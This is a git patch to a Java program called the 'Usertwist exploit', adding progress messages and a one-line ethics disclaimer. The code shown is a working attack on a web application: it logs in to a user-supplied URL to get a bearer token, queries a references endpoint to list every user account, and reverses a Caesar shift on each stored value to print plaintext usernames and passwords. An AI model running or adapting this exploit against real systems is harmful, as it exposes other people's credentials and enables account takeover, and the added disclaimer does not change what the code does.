From 8e73544d2712b1533848aceb48fdca6c8cff4c16 Mon Sep 17 00:00:00 2001
From: Mateo <mdm@athelas.fr>
Date: Thu, 1 Aug 2024 10:54:59 +0200
Subject: [PATCH] Added some verbose

---
 src/fr/motysten/usertwist/exploit/Main.java | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/src/fr/motysten/usertwist/exploit/Main.java b/src/fr/motysten/usertwist/exploit/Main.java
index 9e21ec5..cb477d5 100644
--- a/src/fr/motysten/usertwist/exploit/Main.java
+++ b/src/fr/motysten/usertwist/exploit/Main.java
@@ -22,6 +22,7 @@ public class Main {
         BufferedReader reader = new BufferedReader(new InputStreamReader(System.in));
 
         System.out.println("Usertwist exploit by Motysten");
+        System.out.println("Please don't use for unethical purpose !\n");
         String readLine;
 
         System.out.println("Please enter the URL to attack (leave empty to use default) :");
@@ -42,6 +43,8 @@ public class Main {
         requestJSON.put("username", username);
         requestJSON.put("password", password);
 
+        System.out.println("Gathering Bearer token...");
+
         HttpRequest request = HttpRequest.newBuilder(URI.create(link + "/login"))
                 .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
                 .build();
@@ -50,10 +53,14 @@ public class Main {
         JSONObject responseObject = new JSONObject(response.body());
         String token = responseObject.optString("token");
 
+        System.out.println("Token found: " + token);
+
         requestJSON = new JSONObject();
         requestJSON.put("term", "");
         requestJSON.put("entity", "users");
 
+        System.out.println("\nScanning for existing users...");
+
         request = HttpRequest.newBuilder(URI.create(link + "/references"))
                 .POST(HttpRequest.BodyPublishers.ofString(requestJSON.toString()))
                 .setHeader("Authorization", "Bearer " + token)
@@ -62,12 +69,15 @@ public class Main {
         response = client.send(request, HttpResponse.BodyHandlers.ofString());
         JSONArray usersArray = new JSONArray(response.body());
 
+        System.out.println(usersArray.length() + " users found !");
+        System.out.println("\nDecrypting passwords...\n");
+
         for (int i = 0; i < usersArray.length(); i++) {
             JSONObject user = usersArray.getJSONObject(i);
             String login = user.getString("username");
             String password = Cesar.cesarRotate(user.getString("data"), -4);
 
-            System.out.println(login + " => " + password);
+            System.out.println((i + 1) + ". " + login + " => " + password);
         }
     }